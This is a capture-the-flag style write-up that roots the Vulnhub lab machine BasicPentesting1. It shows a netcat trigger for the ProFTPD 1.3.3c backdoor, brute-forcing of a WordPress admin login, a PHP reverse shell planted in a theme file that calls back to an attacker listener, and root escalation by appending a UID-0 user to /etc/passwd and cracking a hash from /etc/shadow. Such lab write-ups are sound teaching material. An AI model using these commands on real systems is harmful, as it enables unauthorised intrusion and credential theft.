Vulnhub Writeup : BasicPentesting1
Box Stats :
| Box Information | Details |
| Box Name | BasicPentesing1 |
| Series | Basic Pentesting |
| Release Date | 8 Dec 2017 |
| Author | Josiah Pierce |
| Difficulty | Easy |
| Download Link | Link |
Network Scan
The IP of target box is 192.168.1.15, now performing nmap scan on target
$ nmap -sV --top-ports 1000 192.168.1.15 -oN nmap.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-28 18:53 UTC
Nmap scan report for 192.168.1.15
Host is up (0.0034s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.54 secondsNothing unusual, but a quick search for ProFTPD 1.3.3c revealed that it is backdoored version of FTP server. To exploit this backdoor we just need to connect to port 21 with netcat and sends the trigger “HELP ACIDBITCHEZ”.
$ nc 192.168.1.15 21
220 ProFTPD 1.3.3c Server (vtcsec) [192.168.1.15]
HELP ACIDBITCHEZ
uname -a
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/LinuxTo get a proper interactive shell we can use a python trick python -c 'import pty;pty.spawn("/bin/bash")';
$ nc 192.168.1.15 21
python -c 'import pty;pty.spawn("/bin/bash")';
root@vtcsec:/#We got the root access to the machine. Now lets find another ways to get root.
Web Application Reconnaissance
From nmap scan we can see that port 80 is open means there is a web server is running
At above list 192.168.1.15 is our VM ip address.
Directory Bruteforce
Bruteforcing using dirb
$ dirb http://192.168.1.15
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Sep 28 19:16:46 2019
URL_BASE: http://192.168.1.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.15/ ----
+ http://192.168.1.15/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://192.168.1.15/secret/
+ http://192.168.1.15/server-status (CODE:403|SIZE:277)
---- Entering directory: http://192.168.1.15/secret/ ----
+ http://192.168.1.15/secret/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/
==> DIRECTORY: http://192.168.1.15/secret/wp-content/
==> DIRECTORY: http://192.168.1.15/secret/wp-includes/
+ http://192.168.1.15/secret/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.1.15/secret/wp-admin/ ----
+ http://192.168.1.15/secret/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/css/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/images/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/includes/
+ http://192.168.1.15/secret/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/js/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/maint/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/network/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/user/
---- Entering directory: http://192.168.1.15/secret/wp-content/ ----
+ http://192.168.1.15/secret/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.15/secret/wp-content/plugins/
==> DIRECTORY: http://192.168.1.15/secret/wp-content/themes/
==> DIRECTORY: http://192.168.1.15/secret/wp-content/upgrade/
==> DIRECTORY: http://192.168.1.15/secret/wp-content/uploads/
---- Entering directory: http://192.168.1.15/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/network/ ----
+ http://192.168.1.15/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.15/secret/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.1.15/secret/wp-admin/user/ ----
+ http://192.168.1.15/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.15/secret/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.1.15/secret/wp-content/plugins/ ----
+ http://192.168.1.15/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.15/secret/wp-content/themes/ ----
+ http://192.168.1.15/secret/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.15/secret/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Sep 28 19:17:13 2019At above scan we find that there is a hidden wordpress blog at http://192.168.1.15/secret/, lets check it out.
This blog will redirect to http://vtcsec/secret/, so we add vtcsec into our /etc/hosts file.
sudo echo "vtcsec 192.168.1.15" >> /etc/hostsNow the wordpress blog will properly open.
WPScan on WordPress Blog
$ wpscan --url http://192.168.1.15/secret/ --enumerate u
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ _
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.1
WPScan.io - Online WordPress Vulnerability Scanner
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.1.15/secret/
[+] Started: Sun Sep 29 05:46:41 2019
Interesting Finding(s):
[+] http://192.168.1.15/secret/
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.1.15/secret/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.1.15/secret/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.1.15/secret/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.1.15/secret/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.9.11 identified (Latest, released on 2019-09-05).
| Detected By: Emoji Settings (Passive Detection)
| - http://192.168.1.15/secret/, Match: '-release.min.js?ver=4.9.11'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.1.15/secret/, Match: 'WordPress 4.9.11'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=========================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/register.
[+] Finished: Sun Sep 29 05:46:42 2019
[+] Requests Done: 21
[+] Cached Requests: 29
[+] Data Sent: 5.049 KB
[+] Data Received: 10.292 KB
[+] Memory used: 90.594 MB
[+] Elapsed time: 00:00:00As we can see that the userid admin detected by above scan. Now lets bruteforce the wordpress login. We are going to use a simple wordlist file for passwords.
wpscan -U admin -P common.txt --url http://192.168.1.12/secret/And the output shows the password, which is also admin.
.....
[i] Valid Combinations Found:
| Username: admin, Password: admin
.....Now login to wordpress with above credentials.
Getting a shell using WordPress
Link for php reverse shell : Github Link
Change the port number and IP address on script, then put it to the index.php file on wordpress.
Now start netcat listener
$ nc -lvvp 1234And open the wordpress page.
$ nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from vtcsec 52724 received!
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
04:46:01 up 2 min, 0 users, load average: 0.58, 0.60, 0.26
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ We got the shell but its not the root shell, we need to escalate the privilege to root.
Getting root Privilege
Method 1
By overwriting the /etc/passwd file : As we can see that /etc/passwd is permitted to read-write for all users.
$ ls -al /etc/passwd
-rw-rw-rw- 1 root root 2364 Nov 16 2017 /etc/passwdSo by appending a new user who has root privilege assigned, into the /etc/passwd file with password we are able to get root shell.
Preparing new user to append on file : The root user entry is look like this :
root:x:0:0:root:/root:/bin/bashwhere the different columns are as follows :
Username : Encrypted_Password : UserID : GroupID : UserID_Info : Home_DirectoryAt the place of password there is x which means the password is stored on the /etc/shadow file. Now lets create encrypted password for new user :
$ openssl passwd -1 -salt hack password123
$1$hack$MLgkAESrYp7kzYz0Ex2fV/Where :
-1: md5 based password algorithm (other options are -5 for SHA256 and -6 for SHA512 )-salt: salt key, which is “hack”- password is
password123
Now we have to append below line into /etc/passwd file :
newroot:$1$hack$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bashecho "newroot:\$1\$hack\$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash" >> /etc/passwd
Note : Put \ sign before all the $ sign on the password field, else echo command will try ro interpret it as a variable. Now try to login with our newly created user.
$ su - newroot
su: must be run from a terminalBut it through an error, means we need a tty terminal, which can be obtained by python pty library trick.
python -c 'import pty;pty.spawn("/bin/bash");'$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@vtcsec:/$
www-data@vtcsec:/$ su - newroot
su - newroot
Password: password123
root@vtcsec:~# whoami
whoami
root
root@vtcsec:~#Yep!!!, we got the root shell.!!
Method 2
By cracking password of existing users : This method only works if the /etc/shadow file is world readable, which is not allowed by default. But in this case we can read /etc/shadow file
$ cat /etc/shadow
root:!:17484:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
....
....
....
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:7484:0:99999:7:::
mysql:!:17486:0:99999:7:::
sshd:*:17486:0:99999:7:::The shadow file stores actual password in encrypted format for user’s account with additional properties related to user password i.e. it stores secure user account information.
As we can see the user marlinspike have encrypted password :
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::Now save the above line onto the file pass.txt and then we try to crack the hashed password john (jtr).
root@ae3e2e69805d:~/# john pass.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2019-09-29 09:24) 4.347g/s 34.78p/s 34.78c/s 34.78C/s marlinspike..marlin
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ae3e2e69805d:~/# john --show pass.txt
marlinspike:marlinspike:17484:0:99999:7:::
1 password hash cracked, 0 leftand the password for marlinspike is marlinspike, now lets try to login into marlinspike account.
$ su - marlinspike
su: must be run from a terminalMeans we need tty shell then try to change root.
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@vtcsec:/$ su - marlinspike
su - marlinspike
Password: marlinspike
marlinspike@vtcsec:~$ whoami
whoami
marlinspike
marlinspike@vtcsec:~$ sudo su
sudo su
[sudo] password for marlinspike: marlinspike
root@vtcsec:/home/marlinspike# whoami
whoami
root
root@vtcsec:/home/marlinspike# We got root shell again.
